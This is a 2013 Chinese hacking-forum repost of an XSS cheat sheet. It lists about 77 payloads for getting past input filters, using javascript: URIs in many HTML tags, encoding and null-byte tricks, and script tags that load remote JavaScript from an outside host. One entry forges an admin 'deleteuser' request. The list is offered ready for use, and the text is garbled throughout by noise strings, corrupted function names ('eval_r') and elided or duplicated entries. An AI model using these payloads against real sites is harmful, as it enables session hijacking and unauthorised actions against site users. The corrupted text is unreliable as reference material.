找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2794|回复: 0
打印 上一主题 下一主题

XSS攻击汇总

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-19 19:22:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。# `$ p( K6 H+ {% \1 V% \/ A+ C* z: p
(1)普通的XSS JavaScript注入! X+ a5 z0 K0 j6 v2 D
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
1 ~2 v: \5 N; m3 q0 S, {% U  ~4 p(2)IMG标签XSS使用JavaScript命令
( p' |7 C0 ~2 g<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
" ^! l( u# Y& a(3)IMG标签无分号无引号, u4 G8 K) i: l; G3 v- ]
<IMG SRC=javascript:alert(‘XSS’)>
& F$ R- ?' J* q8 U) B* `, t(4)IMG标签大小写不敏感. p$ K; F' ^  |8 f; P6 y
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>& I5 b' @+ A2 n1 M
(5)HTML编码(必须有分号)4 z' B4 }* q9 Q: G& c2 v0 s4 R/ n
<IMG SRC=javascript:alert(“XSS”)>
. e# \1 L* C/ u2 v( X& O(6)修正缺陷IMG标签/ \$ }- N! `7 _& ~
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>$ n7 f6 Y) X# f2 H6 q( W) O5 Z

( `, F1 d8 u7 B: s- O& W% m  i5 K: n3 H0 t
(7)formCharCode标签(计算器)
5 O2 A+ r  k) a4 K. {<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
  l: ]4 c0 f. ](8)UTF-8的Unicode编码(计算器)
; Q2 C. K4 E4 ^4 y<IMG SRC=jav..省略..S')>4 j: S: D  B, J5 a
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)& p) F, Q$ L5 J+ E1 n% M$ ~  \) k, y
<IMG SRC=jav..省略..S')>  o$ f# a9 b2 q8 y8 }8 c/ x
(10)十六进制编码也是没有分号(计算器)) N% K7 L6 |' X# W
<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>
5 U( S& l; {- r(11)嵌入式标签,将Javascript分开, `0 S6 p1 N# a* r# l6 r% ]9 i
<IMG SRC=”jav ascript:alert(‘XSS’);”>
0 F1 ]0 j% i; Q( [. r, M( s(12)嵌入式编码标签,将Javascript分开
( J8 f- `. r6 ~1 l: ~' K" G+ G  j% F<IMG SRC=”jav ascript:alert(‘XSS’);”>7 |4 [- h- A9 `$ z) {
(13)嵌入式换行符
7 g( U7 g# u3 i5 r4 E<IMG SRC=”jav ascript:alert(‘XSS’);”>: D7 f" X+ l0 a
(14)嵌入式回车
' h( z) N7 ~1 V/ Q9 W5 i+ V; e<IMG SRC=”jav ascript:alert(‘XSS’);”>
6 ~6 p/ g# r+ e2 j2 `$ k9 ?& C7 f(15)嵌入式多行注入JavaScript,这是XSS极端的例子
5 N* ^$ Z; o2 S1 u9 w<IMG SRC=”javascript:alert(‘XSS‘)”>0 G/ s; A3 C0 X. j) H1 m% G
(16)解决限制字符(要求同页面)# A, {0 w1 Q5 d  c' I5 W
<script>z=’document.’</script>
# K+ S) u6 R- W% @, p' h<script>z=z+’write(“‘</script>
$ x; y8 C& ?  n+ }2 O- J  ~<script>z=z+’<script’</script>
/ i$ V; M2 {9 x5 k<script>z=z+’ src=ht’</script>
; u6 V$ C: D0 _0 k4 f" O, L1 t<script>z=z+’tp://ww’</script>
4 t: w, d/ y* h2 m+ k<script>z=z+’w.shell’</script>3 ?3 V9 q0 w9 \. @
<script>z=z+’.net/1.’</script>
! v9 U0 B' U) P4 i! b2 Z; O<script>z=z+’js></sc’</script>9 N7 z3 C. c, R9 ~1 ^
<script>z=z+’ript>”)’</script>! {; x$ x6 a7 z: L
<script>eval_r(z)</script>
$ t6 g, d6 O' r7 I1 H(17)空字符12-7-1 T00LS - Powered by Discuz! Board& A+ B$ T& b+ R0 `
https://www.t00ls.net/viewthread ... table&tid=15267 2/6
: S5 B5 s/ w1 C1 ]  @perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out1 B% R# A+ a3 a; H/ h+ _9 J
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用, Y- [; _5 f) R: ]  j# g
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out# w/ y7 T+ J/ I5 \9 }) n9 v
(19)Spaces和meta前的IMG标签
2 R8 f: t9 z0 D/ ]( ^; j" m/ D<IMG SRC=” javascript:alert(‘XSS’);”>
% y6 v  k3 i$ ~% z(20)Non-alpha-non-digit XSS
; T+ a# d$ ~# ^% c<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
) j" u2 V: q9 i+ v2 r8 c(21)Non-alpha-non-digit XSS to 2& k- z, \" L# z' g
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)># B5 a8 n) q1 ]: V$ U4 w0 a& K
(22)Non-alpha-non-digit XSS to 3
+ \/ r& G# @! |8 Q<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
0 |% V6 A+ m. F* A$ p(23)双开括号0 Y1 v# c- {- y5 ~
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
6 e; o6 R8 K& @: O, |# F/ Z9 O(24)无结束脚本标记(仅火狐等浏览器)
$ B$ q7 z* g0 X, x$ a8 P. R<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
4 T3 F* O* z( N, T5 Y: C7 A(25)无结束脚本标记2
7 m$ @. r9 o! m$ h0 P5 s<SCRIPT SRC=//3w.org/XSS/xss.js>
6 F' M* C* q/ `& }(26)半开的HTML/JavaScript XSS
" W" Y. u8 ^4 J) Q, y<IMG SRC=”javascript:alert(‘XSS’)”
2 g0 K) m0 G2 \6 {' X(27)双开角括号
5 ^& Z+ D( W2 U# d7 I4 U<iframe src=http://3w.org/XSS.html <
: U4 @- o6 C' J; S# q2 P$ P(28)无单引号 双引号 分号
  m) l# `) W; H2 J4 a% a<SCRIPT>a=/XSS/
9 v. L: v- X) a6 v$ ^' }1 v. I9 L# Yalert(a.source)</SCRIPT>
. m4 X+ Z3 B5 z: T% Z3 T  A' ](29)换码过滤的JavaScript
3 d$ y- Z; n# B8 k\”;alert(‘XSS’);//9 E+ f" T' i9 _2 E& C5 {
(30)结束Title标签
' Z$ _; R8 I% |0 A$ k</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>" U# J2 @  S7 v( f$ ]
(31)Input Image+ X/ V5 m+ q7 w/ L! ~  W9 C
<INPUT SRC=”javascript:alert(‘XSS’);”>+ x$ S/ U7 M( B! F! K
(32)BODY Image
* ?$ W0 K) a$ a<BODY BACKGROUND=”javascript:alert(‘XSS’)”>  ^$ b/ u$ y- }/ U6 x, B0 O' {
(33)BODY标签
- S  o  J# v  x8 w<BODY(‘XSS’)>
/ P7 }* j2 O! v2 d- w(34)IMG Dynsrc
" A2 Q4 G3 w7 `/ e8 C<IMG DYNSRC=”javascript:alert(‘XSS’)”>
. B: h$ N$ D; _& Y3 w0 l(35)IMG Lowsrc
: F1 k1 J" E3 T$ o$ X+ F<IMG LOWSRC=”javascript:alert(‘XSS’)”>
& Z7 y# T1 W. C* M(36)BGSOUND
) B. s- k- W/ r# E" Q7 m  n<BGSOUND SRC=”javascript:alert(‘XSS’);”>  L% r$ V: k( {! d
(37)STYLE sheet
6 n; q3 G: T' e* [9 R' V9 e<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
; |# v% p1 q; y/ h7 _8 p(38)远程样式表$ S7 l  c: T% `- I# n! x
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
4 E5 `3 p: ^5 F2 s$ N) Y+ y* [(39)List-style-image(列表式)
* ~" h# I1 |9 `  [9 g( E<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
. i5 C4 M4 U# y7 y(40)IMG VBscript
( K5 g* ~, I! Q  \9 e7 F<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
4 y' ]- `2 @- E$ M, Y(41)META链接url
" z* n2 |  ?8 c: l! ^% `" E$ e
% H8 @8 ~* d8 D; k6 p
; R4 p' z/ D: P6 U1 O- {6 P/ g$ O* `( H<META HTTP-EQUIV=”refresh” CONTENT=”0;+ b5 G8 `* y0 [! Q$ F+ I
URL=http://;URL=javascript:alert(‘XSS’);”>
( ~! Y9 }8 X' W9 M2 f(42)Iframe; F7 s# x$ \) }
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>  [# y: x& _, z) j; n7 W6 H
(43)Frame
2 q7 u& W- ~4 _8 b4 Q6 I( B2 S' s<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board( O9 X9 G  D2 {$ C
https://www.t00ls.net/viewthread ... table&tid=15267 3/6, R! q! @0 ~/ n  i
(44)Table
0 w" d. x2 T1 `$ |% l' g  _1 p6 r% e<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
' q; f' _" K; z1 u$ P(45)TD& ?" e) H; E; ~% x
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
% U% T  X7 Y/ H/ k' u% }(46)DIV background-image7 X" H+ f( w  W8 }! P4 @, m
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>5 p- q: e/ c8 A
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
1 C7 b7 Y' Z2 M" [, W3 Q) B; G8&13&12288&65279)
! V+ t' ^$ Y. P+ Y<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>2 _8 s- i' k' \3 _2 b
(48)DIV expression2 i0 O6 Y/ _. z$ ]' S
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
$ C4 w6 q* V9 c  K! L3 i. O(49)STYLE属性分拆表达3 G; u. Y" ]" e; z$ @) S9 ]
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
  ?) K. o& T& t  [" h" ?(50)匿名STYLE(组成:开角号和一个字母开头)
0 N! i5 x) o" G; {; N# e: y2 n$ ~<XSS STYLE=”xss:expression_r(alert(‘XSS’))”># u# ~, H( Q- t% o' o; Y! f6 }: D
(51)STYLE background-image2 _* o3 @+ o( C6 f  Q9 y1 [5 M( {8 p
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A
4 L5 k4 P7 H! F" M) ^4 jCLASS=XSS></A>- E" y" U9 x) q# {8 i, O8 H
(52)IMG STYLE方式" p# I, s( t8 c9 N
exppression(alert(“XSS”))’>/ I4 D5 x2 }( y6 l
(53)STYLE background2 B3 a9 I; ^$ F5 g! C
<STYLE><STYLE
* j8 P9 ~4 p3 Ltype=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
# _- v% `# l  ](54)BASE
! e4 R9 u2 l- W( {, M7 p<BASE HREF=”javascript:alert(‘XSS’);//”>
& w+ b% |# B" f3 Z, g" g(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS3 q# ^9 V4 T& ?9 m9 J, ?
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>/ M* q9 q$ M) K0 [7 \! X
(56)在flash中使用ActionScrpt可以混进你XSS的代码7 E0 g7 M; M4 K  z0 j: W5 ~
a=”get”;
. r6 V- ^! y) hb=”URL(\”";& U0 M7 E/ e, M. N# A7 D9 w# [9 H
c=”javascript:”;/ B! w( a9 F3 a. z( I1 q0 \
d=”alert(‘XSS’);\”)”;, ^4 i9 g& X+ |
eval_r(a+b+c+d);" g5 l, A9 l+ Z- W+ M. o3 u
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上5 E+ @8 _- h+ B) V1 A- n6 H
<HTML xmlns:xss>
; q4 a8 S$ k! e+ W<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>! `- X2 a! ^) U$ s
<xss:xss>XSS</xss:xss>
) S' a7 H7 _$ g' M</HTML>
  F. f8 p  B  f$ [5 K9 d, w: W(58)如果过滤了你的JS你可以在图片里添加JS代码来利用9 [, S- w2 P4 v8 f. ~% x9 G. H
<SCRIPT SRC=””></SCRIPT>
0 {8 }; C; Q4 j% x: H(59)IMG嵌入式命令,可执行任意命令
8 @+ J. p* w3 e/ y/ }" ^+ H<IMG SRC=”http://www.XXX.com/a.php?a=b”>
3 ]/ v6 c( x9 {+ P(60)IMG嵌入式命令(a.jpg在同服务器)( d3 G/ p! i2 f( m/ [/ k
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
0 {' v7 V) N: m' b3 i& }% b0 d9 Z' w(61)绕符号过滤5 o- Q6 t. c6 _7 X. ^3 K; [4 J
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>4 z8 F& G% h6 D& U- x
(62)
8 Y. L$ ~% o1 E8 q<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>& o# ^" ^8 j( i  N6 q  c
(63)
: |9 u) `  I$ ]<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>% ?& w4 w6 z, J2 O
(64)+ y/ j, {6 p$ @9 ~0 f' J/ R7 |( n
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
' a; m+ w( j7 \$ c(65)9 V2 v2 i4 i$ ~5 m
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
, k, J5 R' n$ k  S(66)12-7-1 T00LS - Powered by Discuz! Board
- M! N( n8 n* V5 _- [  Chttps://www.t00ls.net/viewthread ... table&tid=15267 4/6
1 P- H( \+ B, }! n. i  N0 n<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
6 S, L, o4 R8 y* S(67)  b1 a+ O# h* Y$ ]( l# q) \
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>
1 \9 l% ?8 _' g" n2 a. v</SCRIPT>
. m& M: m, K* N, {" I(68)URL绕行
! @: k* c+ Y  _1 p% j1 E/ ~  t<A HREF=”http://127.0.0.1/”>XSS</A>9 p2 V1 N3 i! f9 K' b
(69)URL编码
2 \: T* s0 D  |, N$ |! p% U<A HREF=”http://3w.org”>XSS</A>$ {8 v, b' ]7 d% O
(70)IP十进制6 {2 |/ O" e7 t- b& N6 m, \6 |
<A HREF=”http://3232235521″>XSS</A>
0 P6 R# J- ~' A. C(71)IP十六进制
9 s  o. A2 `. ~<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
1 W2 \$ l% ^+ H( A3 Q; r! K(72)IP八进制
( g, H7 s& a: A& }<A HREF=”http://0300.0250.0000.0001″>XSS</A>
1 q% B1 ^0 l* r( F& ?3 t8 U$ Z(73)混合编码
# q7 ?- V7 V. d<A HREF=”h
$ b  v' J: s% ]" q7 ntt p://6 6.000146.0×7.147/”">XSS</A>: ~* ?4 `: n5 h0 i8 P! \  s
(74)节省[http:]. [8 g4 c8 E7 O3 S2 o& U* j- o  K
<A HREF=”//www.google.com/”>XSS</A>
. y3 o9 }! v% @( W' `$ [(75)节省[www]
+ Z# h! W# o: ]2 M2 x% S* z<A HREF=”http://google.com/”>XSS</A>; G/ P3 s) |) U9 R* u% z
(76)绝对点绝对DNS4 S& W* Q8 G8 u, ?0 s1 {5 p
<A HREF=”http://www.google.com./”>XSS</A>
) P- i0 o6 r9 E(77)javascript链接; V, \# t( h6 G  q% V
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
* J# C3 {3 o" H
3 F/ U) S# K" D原文地址:http://fuzzexp.org/u/0day/?p=14
, Y2 a6 B/ P* n- A
" ?5 P! E4 p4 V  s
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表